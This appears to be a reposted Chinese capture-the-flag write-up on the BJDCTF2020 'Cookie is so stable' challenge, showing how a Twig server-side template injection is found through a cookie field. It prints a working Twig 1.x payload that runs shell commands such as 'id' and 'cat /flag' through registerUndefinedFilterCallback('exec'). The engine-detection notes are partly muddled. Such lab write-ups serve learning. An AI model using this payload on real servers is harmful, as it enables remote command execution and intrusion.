本文主要是介绍Twing模板注入 [BJDCTF2020]Cookie is so stable1,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
打开题目
我们先抓包分析一下
可以输入{{7*7}}处发包试一下
可以看到在cookie处存在ssti模板注入
输入{{7*‘7’}},返回49表示是 Twig 模块
输入{{7*‘7’}},返回7777777表示是 Jinja2 模块
在这里可以看出是Twing模块
我们直接用固定payload就可以得到flag
知识点:
1.
输入{{7*‘7’}},返回49表示是 Twig 模块
输入{{7*‘7’}},返回7777777表示是 Jinja2 模块
2.Twing固定的解题payload:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} //查看ID{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} //查看flag
//只使用于Twing1.x
参考文章见:Twig 模板注入从零到一 - 先知社区
这篇关于Twing模板注入 [BJDCTF2020]Cookie is so stable1的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
